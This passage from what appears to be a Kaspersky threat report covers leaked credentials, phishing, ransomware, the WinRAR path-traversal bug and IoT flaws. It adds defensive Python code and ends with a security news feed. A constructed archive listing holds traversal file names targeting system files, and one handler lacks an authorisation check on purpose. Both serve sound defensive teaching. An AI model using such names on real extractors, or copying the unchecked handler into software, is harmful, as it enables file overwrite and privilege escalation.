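One practical defence against the credential reuse described here is to check a chosen password against leaked corpora at sign-up or password change, without sending the password itself anywhere. The code below is an added example, not Kaspersky's; it follows the range-query design of Troy Hunt's Pwned Passwords service, in which the client sends only the first five hex characters of the password's SHA-1 hash and matches the remaining suffix locally. The leaked list is constructed, and the RangeServer class stands in for the remote API.

```python
"""
Checking a password against a leaked-credential corpus without revealing it
(added example, not Kaspersky's code). The corpus below is constructed;
RangeServer stands in for a remote range-query API.
"""
import hashlib
from collections import Counter, defaultdict
from typing import Dict, List

PREFIX_LEN = 5  # hex characters of the hash that leave the client


def sha1_hex(password: str) -> str:
    """Uppercase hex SHA-1 of the password (the corpus is keyed this way)."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


class RangeServer:
    """Holds hashes of leaked passwords, indexed by hash prefix."""

    def __init__(self, leaked_passwords: List[str]) -> None:
        self._index: Dict[str, Counter] = defaultdict(Counter)
        for pw in leaked_passwords:
            h = sha1_hex(pw)
            self._index[h[:PREFIX_LEN]][h[PREFIX_LEN:]] += 1

    def lookup(self, prefix: str) -> List[str]:
        """Return every 'SUFFIX:COUNT' line for the prefix. The server never
        learns which suffix, if any, the client was interested in."""
        bucket = self._index.get(prefix, Counter())
        return [f"{suffix}:{count}" for suffix, count in sorted(bucket.items())]


def breach_count(password: str, server: RangeServer) -> int:
    """How many times the password appears in the corpus (0 if never)."""
    h = sha1_hex(password)
    prefix, suffix = h[:PREFIX_LEN], h[PREFIX_LEN:]
    for line in server.lookup(prefix):
        candidate, count = line.split(":")
        if candidate == suffix:
            return int(count)
    return 0


def password_policy(password: str, server: RangeServer) -> str:
    """Decision a sign-up or password-change handler would act on."""
    n = breach_count(password, server)
    if n > 0:
        return f"reject: seen {n} time(s) in leaked data"
    return "accept"


# Constructed stand-in for a Collection #1-style dump (duplicates are
# deliberate: the same password appears in several source leaks).
LEAKED = ["password", "123456", "qwerty", "password", "letmein", "123456"]
SERVER = RangeServer(LEAKED)

if __name__ == "__main__":
    for pw in ["password", "letmein", "correct horse battery staple"]:
        print(pw, "->", password_policy(pw, SERVER))
```

The same lookup can be run in bulk over an organisation's existing accounts at password-reset time, which is how a defender turns a dump like Collection #1 into a forced rotation of exactly the credentials that are exposed.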

Social engineering

In our threat predictions for 2019, we described social engineering as the most successful infection vector ever and indicated why we thought it would remain so. The key to its success lies in sparking the curiosity of potential victims. Massive data leaks, such as the ones discussed above, help attackers to fine-tune their approach, making it more successful. Phishers will latch on to any topic that they think will pique the interest of their victims. We saw this recently in a campaign that hooked into events in Venezuela.

On February 10, Juan Guaido made a public call for volunteers to join a new movement called ‘Voluntarios por Venezuela’ (Volunteers for Venezuela), to help international organizations deliver humanitarian aid to the country. The original website asks volunteers to provide their full name, personal ID, cell phone number, and whether they have a medical degree, a car, or a smartphone, and also their location. The volunteers sign up and then receive instructions on how to help.

Just a few days after the legitimate site appeared, an almost identical website appeared. Both the legitimate and fake sites used SSL from Let’s Encrypt. The scariest aspect was that these two different domains, with different owners, were resolved within Venezuela to the same IP address, belonging to the fake domain owner. So it didn’t matter if a volunteer opened the legitimate domain name or the fake one – in the end their personal information was injected into a fake site.

In this scenario, where DNS servers are being manipulated, we would strongly recommend using public DNS servers such as Google DNS servers (8.8.8.8 and 8.8.4.4) or CloudFlare and APNIC DNS servers (1.1.1.1 and 1.0.0.1). We also recommend using VPN connections without a third-party DNS.

LockerGoga ransomware attacks

Ransomware continues to be a problem for consumers and businesses alike, notwithstanding a relative decline in numbers in the last two years. In 2018, we blocked 765,538 crypto-ransomware attacks on computers protected by Kaspersky Lab products, of which around 220,000 included corporate customers.

The most recent to hit the headlines is LockerGoga, which recently compromised the systems of Altran, Norsk Hydro and other companies. It’s unclear who’s behind the attacks, what they want and the mechanism used to first infect its victims. It’s not even clear if LockerGoga is ransomware or a wiper. The malware encrypts data and displays a ransom note asking victims to get in touch to arrange decryption, in return for an (unspecified) payment in bitcoins.

However, later versions were observed by researchers that forcibly log victims off infected systems by changing their passwords, and removing their ability to even log back in to the system. In such cases, the victims may not even get to see the ransom note.

19-year-old bug in WinRAR

Recently, researchers from Check Point discovered a long-standing vulnerability in the popular WinRAR utility – used by around 500 million people worldwide. This path traversal zero-day vulnerability (CVE-2018-20250) enables attackers to specify arbitrary destinations during file extraction of ‘ACE’-formatted files, regardless of user input.

This vulnerability has been fixed in the latest version of WinRAR (5.70), but since WinRAR itself does not contain an auto-update feature, it’s probable that many existing users will continue to run out-of-date versions.
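The underlying defect class, an extractor that trusts the destination path stored in the archive, is fixed by validating each member name against the target directory before writing. The function below is an added example, not WinRAR's or Check Point's code: it rejects absolute paths, drive letters and any parent-directory component, and double-checks that the resolved location stays inside the destination. The member names in the sample listing are constructed to cover those cases.

```python
"""
Destination validation for archive extraction (added example; not WinRAR's
or Check Point's code). Member names below are constructed to show the cases
a path-traversal bug of the kind described above exploits.
"""
import os
from pathlib import PurePosixPath
from typing import Dict, List, Tuple


class UnsafeArchivePath(ValueError):
    """Raised for a member name that would land outside the target directory."""


def resolve_member_path(dest_dir: str, member_name: str) -> str:
    """
    Return the path, relative to dest_dir, at which the member may be
    written. Rejects absolute paths, drive letters, any '..' component and,
    as a last line of defence, anything whose resolved location is not
    inside dest_dir.
    """
    name = member_name.replace("\\", "/")      # archives may use either separator
    if not name or name.startswith("/"):
        raise UnsafeArchivePath(f"absolute or empty name: {member_name!r}")
    if len(name) >= 2 and name[1] == ":":
        raise UnsafeArchivePath(f"drive letter in name: {member_name!r}")
    parts = PurePosixPath(name).parts           # collapses '.' and repeated '/'
    if not parts:
        raise UnsafeArchivePath(f"empty name: {member_name!r}")
    if ".." in parts:
        raise UnsafeArchivePath(f"parent reference in name: {member_name!r}")
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, *parts))
    if os.path.commonpath([dest, target]) != dest:
        raise UnsafeArchivePath(f"escapes target directory: {member_name!r}")
    return os.path.relpath(target, dest)


def plan_extraction(dest_dir: str, member_names: List[str]) -> Dict[str, list]:
    """Split an archive listing into writable members and rejected ones."""
    allowed: List[str] = []
    rejected: List[Tuple[str, str]] = []
    for name in member_names:
        try:
            allowed.append(resolve_member_path(dest_dir, name))
        except UnsafeArchivePath as exc:
            rejected.append((name, str(exc)))
    return {"allowed": allowed, "rejected": rejected}


# Constructed listing: two ordinary members followed by five that try to
# write outside the extraction directory.
SAMPLE_LISTING = [
    "docs/readme.txt",
    "img/./logo.png",
    "../../outside/file.txt",        # parent references
    "..\\..\\outside\\file.txt",     # same, with Windows separators
    "/etc/crontab",                  # absolute POSIX path
    "C:\\Windows\\win.ini",          # absolute Windows path
    "docs/../../escape.txt",         # traversal hidden behind a valid prefix
]

if __name__ == "__main__":
    plan = plan_extraction("/tmp/extract", SAMPLE_LISTING)
    for rel in plan["allowed"]:
        print("write  ", rel)
    for name, reason in plan["rejected"]:
        print("reject ", name, "->", reason)
```

Rejecting every `..` component outright is stricter than strictly necessary (a name such as `a/../b` resolves inside the target), but it is the rule most extractors adopt because it is easy to audit; the final commonpath check catches anything the earlier string rules miss.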

The internet of secure, and not so secure, things

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. These include household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys, as well as cars, medical devices, CCTV cameras and parking meters. This offers a broad attack surface for anyone looking to take advantage of security weaknesses – for whatever purpose. Sadly, all too often we see reports of vulnerabilities in smart devices that could leave both consumers and organizations open to attack.

In February, at MWC19, researchers from our ICS CERT presented a report on the security of artificial limbs developed by Motorica. They looked at three aspects: firmware, the handling of data and the security of data in the cloud.

On the plus side, they found no vulnerabilities in the firmware of the prosthetic limbs themselves, or in the handling of data – since data flows one way only, from the limb to the cloud, it’s not possible to hack the device and take control of it remotely. However, they did find flaws in the development of the cloud infrastructure that could allow an attacker to gain access to data from the smart limb.

Werner Schober, a researcher at SEC Consult took an intimate look at the security of a sex toy. The device, designed to connect to an Android or iOS smartphone using Bluetooth, is controlled through a special app, either locally or remotely. On top of this, the app features a fully-fledged social network with group chats, photo galleries, friend-lists and more. The researcher was able to access the data of all users of the device, including usernames, passwords, chats, images and videos. Even worse, he was able to find a way to control the devices of other users. There was no mechanism for updating the firmware. However, he was able to find interfaces on the device that the manufacturer had used for debugging purposes and forgotten to close.

Researchers at Pen Test Partners recently discovered a flaw that exposes the sensitive data of children wearing GPS tracking watches, including their name, parents’ details and real-time location information. This was because of a privilege escalation vulnerability: the system failed to validate that the user had the appropriate permission to obtain admin control, so an attacker with access to the watch’s credentials could change the permissions at the backend, exposing the account information and data stored on the watch.
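The backend failure described here is authentication without authorisation: the request came from a valid account, so the role change was applied. The following added example (not Pen Test Partners' code nor the vendor's) contrasts that pattern with a handler that checks the caller's own role before touching anyone's permissions and records denied attempts for the operations team. Account identifiers and roles are constructed.

```python
"""
Server-side permission check on a role-change endpoint (added example; not
Pen Test Partners' code nor the watch vendor's). Accounts, roles and request
shapes are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List

ROLE_RANK = {"child": 0, "parent": 1, "admin": 2}


@dataclass
class Account:
    account_id: str
    role: str


@dataclass
class Backend:
    accounts: Dict[str, Account] = field(default_factory=dict)
    audit_log: List[str] = field(default_factory=list)

    def _require_account(self, account_id: str) -> Account:
        try:
            return self.accounts[account_id]
        except KeyError:
            raise PermissionError(f"unknown account {account_id!r}") from None

    def change_role_vulnerable(self, caller_id: str, target_id: str,
                               new_role: str) -> str:
        """Pattern behind the flaw above: the request is authenticated (the
        caller exists) but never authorised, so any holder of valid
        credentials can make any account, including their own, an admin."""
        self._require_account(caller_id)
        target = self._require_account(target_id)
        target.role = new_role
        return target.role

    def change_role_fixed(self, caller_id: str, target_id: str,
                          new_role: str) -> str:
        """Authorise against the caller's stored role, never the request."""
        caller = self._require_account(caller_id)
        target = self._require_account(target_id)
        if new_role not in ROLE_RANK:
            raise ValueError(f"unknown role {new_role!r}")
        # Only admins may change roles, and nobody may grant a role that
        # outranks their own.
        if caller.role != "admin" or ROLE_RANK[new_role] > ROLE_RANK[caller.role]:
            self.audit_log.append(f"DENIED {caller_id} -> {target_id}:{new_role}")
            raise PermissionError("caller may not change this role")
        target.role = new_role
        self.audit_log.append(f"OK {caller_id} -> {target_id}:{new_role}")
        return target.role


def make_backend() -> Backend:
    """Constructed accounts: a vendor admin, one parent and the child's watch."""
    b = Backend()
    for account_id, role in [("vendor-admin", "admin"),
                             ("parent-42", "parent"),
                             ("watch-42", "child")]:
        b.accounts[account_id] = Account(account_id, role)
    return b


def attempt(backend: Backend, handler: str, caller: str, target: str,
            role: str) -> str:
    """Call one of the two handlers and report the outcome as a string."""
    try:
        return getattr(backend, handler)(caller, target, role)
    except PermissionError:
        return "denied"


if __name__ == "__main__":
    b = make_backend()
    print("vulnerable:", attempt(b, "change_role_vulnerable", "parent-42", "parent-42", "admin"))
    b = make_backend()
    print("fixed:     ", attempt(b, "change_role_fixed", "parent-42", "parent-42", "admin"))
    print("audit:     ", b.audit_log)
```

The audit line for a denied self-promotion is the detection signal: a parent account repeatedly asking to become admin is exactly the behaviour a backend should be alerting on rather than silently honouring.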

It’s essential that vendors consider security when products are being designed. However, it’s also vital that consumers consider security before buying any connected device. This includes disabling functions that you don’t need – or even asking yourself if you need a connected version of the device at all. It also means looking online for information about any vulnerabilities that may have been reported and checking to see if it’s possible to update the firmware on the device. Finally, it’s important to change the default password and replace it with a unique, complex password. You can use the free Kaspersky IoT Scanner to check your Wi-Fi network and tell you if the devices connected to it are safe.

WannaCry-Infested Laptop Starts at $1.13M in Art Auction

VirusList.com - 22 May, 2019 - 22:09
The "bestiary" houses six historical threats that combined resulted in at least $95B in damages worldwide.
Category: Viry a Červi

Critical Flaws in Khan Academy Opened Door to Account Takeovers

VirusList.com - 22 May, 2019 - 19:44
The two critical cross-site request forgery flaws in the online learning non-profit Khan Academy have been resolved.
Category: Viry a Červi

US Air Force probes targeted malware attack, blames... er, the US Navy? What?

The Register - Anti-Virus - 22 May, 2019 - 16:59
War crimes trial takes a fresh twist

The US Air Force has opened an investigation into a "malware" infection – which it is blaming on lawyers employed by the US Navy who are working on a war crimes case.…

Category: Viry a Červi

Windows Zero-Day Drops on Twitter, Developer Promises 4 More

VirusList.com - 22 May, 2019 - 16:56
SandboxEscaper has released her latest local privilege-escalation exploit for Windows.
Category: Viry a Červi

Google Stored G Suite Passwords in Plaintext Since 2005

VirusList.com - 22 May, 2019 - 15:16
Google said it had stored G Suite enterprise users' passwords in plain text since 2005, marking a giant security faux pas.
Category: Viry a Červi

Instagram data from 49 million accounts found lying around online

Sophos Naked Security - 22 May, 2019 - 13:12
A security researcher has discovered a massive cache of data on millions of Instagram influencers, publicly accessible for everyone to see.

Some Androids don’t call 911 when you tell them to call an ambulance

Sophos Naked Security - 22 May, 2019 - 12:52
Sometimes you get a list of ambulance companies, sometimes a blog post on when it's OK to call an ambulance.

Don’t break Windows 10 by deleting SID, Microsoft warns

Sophos Naked Security - 22 May, 2019 - 12:44
Sometimes it's best not to tinker under the hood - especially when it comes to security IDs.

Hackers for hire – the good, the bad and the just-plain-scammers

Sophos Naked Security - 22 May, 2019 - 11:48
Google & UC San Diego researchers found that only 5 of 27 hacker-for-hire services actually launched attacks against their targets.

Bug-hunter reveals another 'make me admin' Windows 10 zero-day – and vows: 'There's more where that came from'

The Register - Anti-Virus - 22 May, 2019 - 05:59
Vulnerability can be exploited to turn users into system stars, no patch available yet

Updated A bug-hunter who previously disclosed Windows security flaws has publicly revealed another zero-day vulnerability in Microsoft's latest operating systems.…

Category: Viry a Červi

G Suite'n'sour: Google resets passwords after storing some unhashed creds for months, years

The Register - Anti-Virus - 22 May, 2019 - 02:00
Biz app login details encrypted at rest, though, ad giant insists

Google admitted Tuesday its paid-for G Suite of cloudy apps aimed at businesses stored some user passwords in plaintext albeit in an encrypted form.…

Category: Viry a Červi

Mozilla Tackles Two Critical Flaws with Firefox 67 Release

VirusList.com - 21 May, 2019 - 23:21
Mozilla has released a host of fixes for its browser as it rolls out its latest 67 version of Firefox, which touts better speed and privacy.
Category: Viry a Červi

Intel Fixes Critical, High-Severity Flaws Across Several Products

VirusList.com - 21 May, 2019 - 23:02
Intel has issued fixes for a slew of vulnerabilities, separate from the side-channel bugs disclosed last week.
Category: Viry a Červi